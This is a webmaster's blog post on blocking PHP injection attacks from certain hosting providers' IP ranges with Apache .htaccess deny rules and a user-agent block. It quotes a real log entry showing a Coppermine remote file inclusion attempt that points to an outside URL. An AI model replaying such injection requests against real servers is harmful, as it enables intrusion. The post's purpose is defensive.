Block server exploit attacks coming from ThePlanet IP space

When it comes to hackers and cyber criminals using leased, co-located, or hijacked web servers to attack other web servers, one of the top culprits I see in my daily access logs is traceable to ThePlanet.com, based in Dallas, Texas. More server attacks originate from their IP addresses during any givien week than from anywhere else. This has been the case for at least three years in a row.

When I say "server attacks" I am referring to attempts to hack a web server, or website, by sending codes to it that are designed to exploit unpatched versions of software commonly used by website owners. Most attempts involve trying to upload or inject a hostile file to a PHP script that is known to be exploitable. These are known a PHP Injection Exploits. Of those targeted scripts, the one that I see almost every day, in my access logs, is the Coppermine Gallery script. Hardly a day goes by that some script kiddie, or hacker, or bot tries to upload or inject hostile files to my server via Coppermine exploits, as demonstrated in the following actual log entry:

70.85.136.34 - - [12/Nov/2009:06:30:02 -0800] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 403 137 "-" "Mozilla/5.0"

We can use DNSStuff or DomainTools to run a WhoIs lookup on that IP address...

WHOIS - 70.85.136.34
Location: United States [City: Dallas, Texas]
OrgName: ThePlanet.com Internet Services, Inc.
NetRange: 70.84.0.0 - 70.87.255.255
CIDR: 70.84.0.0/14

Definition of CIDR
In the above results, the last item shown is the CIDR of the entity in question. CIDR stands for "Classless InterDomain Routing." It is designated by appending a forward slash and number to the end of a starting IP address, to designate an entire range of IPs assigned to that entity. In this case, 70.84.0.0/14 covers all IPs between 70.84.0.0 trough 70.87.255.255.

The CIDR covering ThePlanet.com is shown to be 70.84.0.0/14, but they have other assigned CIDRs that are used by hackers and spammers. All pertinent CIDRs that I have discovered to this date for ThePlanet.com are listed further down in this article, in "deny from" rules, which are referred to as a "blocklist." I have also thrown in IPs belonging to Everyone's Internet and Rackspace, both favorites of spammers and hackers. Any IP address that is covered by one of the CIDRs in the blocklist will get a server 403 Forbidden response, no matter what page they try to view on a website that employs these rules.

Furthermore, I have included a ".htaccess" "Mod_Rewrite" rule to block the exact user agent "Mozilla/5.0" - which is a known hacking tool. Read on and learn to how protect your Apache web server, or Apache hosted websites, from exploit attacks coming from ThePlanet and the like, or Mozilla/5.0 hack tools.

If you own a website and it is hosted on an Apache web server and you are allowed to modify a special control file named ".htaccess," you can add IP addresses and CIDRs to "deny from" blocklists and probably also perform Mod_Rewrite overrides as well. Use your main .htaccess file to deny access (403 Forbidden) to the CIDRs assigned to ThePlanet hosting services and to anybody using the hacker tool identified as "Mozilla/5.0." Use the following codes in a .htaccess in your public web root to block ThePlanet, et al.

If you already have a .htaccess in the web root, log onto the server with your FTP client, then unhide hidden server files by means of any options to do so, or input the code -al into the "Remote File Mask" input box. Download .htaccess to your computer and open it for editing in a plain text editor (e.g. Notepad), immediately save it as .htaccess1, or htaccess.txt as a backup, then copy and paste the directives below into it. Save the changes and upload it back to the server. Be sure to try to view your home page right after making changes to .htaccess and always save a backup copy of the unaltered file with a 1 appended to the name (e.g. .htaccess1 or htaccess.txt). In the event you make a typographic error you will get a "Server 500" error, which locks everyone out of viewing the website. If that occurs just upload the original saved .htaccess, delete the problem file on the server and rename the original back to .htaccess. Then go over your changes on the local copy and correct any typos, then try uploading it again.

Just remember this rule when editing .htaccess: If it isn't a known directive or command, precede it with the # sign. That makes it a comment and it is ignored by the server. Forget to do this and you will get a Server 500 lockout.

.htaccess additions to block ThePlanet , Everyone's Internet, Rackspace and Mozilla/5.0:

<Files *>
order deny,allow
# ThePlanet.com and Everyones Internet
deny from 64.5.32.0/19 64.246.0.0/18 66.98.128.0/17 67.15.0.0/16 67.18.0.0/15 69.93.0.0/16 70.84.0.0/14 74.52.0.0/14 75.125.0.0/16 174.132.0.0/15 207.44.128.0/17 209.62.0.0/17 216.127.64.0/19

# Let's toss in "Rackspace" - Hackers, spammers, scammers and phishers
deny from 67.192.0.0/16 69.20.0.0/17 72.3.128.0/17 72.32.0.0/16 74.205.0.0/17
</Files>

# Now, to kill requests from hackers using the user agent "Mozilla/5.0" - add these directives under the previous section:

Options +FollowSymLinks
RewriteEngine On
RewriteOptions inherit
RewriteBase /

RewriteCond %{HTTP_USER_AGENT} ^Mozilla/5\.0$
RewriteRule .* - [F]

# end of .htaccess additions

I will be writing other articles showing you how to block more of these PHP injection exploit attacks, at a later date. If you want to use pre-defined .htaccess blocklists, I have four of them online and available from my Htaccess Blocklists page. Copy and paste them into your .htaccess file as needed, testing as you go. Please consider donating via PayPal, to help me pay for my research time and hosting costs. Donation buttons are found on all of my blocklist pages.